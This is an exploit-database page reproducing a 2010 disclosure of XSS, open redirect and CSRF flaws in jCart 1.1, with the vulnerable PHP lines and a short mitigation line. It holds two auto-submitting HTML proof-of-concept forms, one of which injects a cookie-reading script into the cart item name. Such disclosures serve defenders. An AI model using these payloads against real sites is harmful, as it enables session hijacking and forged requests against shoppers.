header-logo
Suggest Exploit
vendor:
jCart
by:
p0deje
7,5
CVSS
HIGH
Cross-site Scripting, Cross-site Scripting / Open Redirect
79,601
CWE
Product Name: jCart
Affected Version From: <=1.1
Affected Version To: <=1.1
Patch Exists: NO
Related CWE: --
CPE: //a:jcart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OS Independent
2010

jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities

User-supplied input for variable $item_name isn't properly escaped and user-supplied data is not properly escaped before passing to header() function.

Mitigation:

Input validation and output encoding should be used to prevent XSS and Open Redirect vulnerabilities.
Source

Exploit-DB raw data:

<!-- 
     Exploit Title: jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities
     Date: 25.07.2010
     Author: p0deje
     Software Link: http://conceptlogic.com/jcart/
     Version: <=1.1
     Tested on: OS Independent
     CVE : --
-->

<!-- 1. Cross-site Scripting -->

<!--  
      Vulnerable code snippet:
      jcart.php
      -------------------------
      line 251:        $item_name = $_POST[$item_name];
      ...
      line 256:        $item_added = $this->add_item($item_id, $item_qty, $item_price, $item_name);
      -------------------------

      User-supplied input for variable $item_name isn't properly escaped.

      Proof-of-Concept:
-->
      <html>
        <form action="http://evil.host/jcart-1.1/jcart/jcart-relay.php" method="POST">
          <input name="my-item-id" value="3" type="hidden">
          <input name="my-item-qty" value="1" type="hidden">
          <input name="my-item-name" value="<script>alert(document.cookie)</script>" type="hidden">
          <input name="my-item-price" value="33.25" type="hidden">
          <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit">
          </form>
          <script>
            document.getElementById('payload').click()
        </script>
      </html>

<!--  2. Cross-site Scripting / Open Redirect -->

<!--
      Vulnerable code snippet 
      jcart-gateway.php:
      -------------------------
      line 41:    header('Location: ' . $_POST['jcart_checkout_page']);
      -------------------------

      User-supplied data is not properly escaped before passing to header() function.

      Proof-of-Concept:
-->
      <html>
        <form action="http://evil.host/jcart-1.1/jcart/jcart-gateway.php" method="POST">
          <input name="jcart_checkout_page" value="http://www.google.com" type="hidden">
          <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit">
          </form>
          <script>
            document.getElementById('payload').click()
        </script>
      </html>

<!--  3. Cross-site Request Forgery -->

<!--
      All requests of jCart are vulnerable to CSRF.
      Proof-of-Concept goes the same as for the first or the second vulnerability.
-->

Navigation

Suggest Exploit

Services By CQR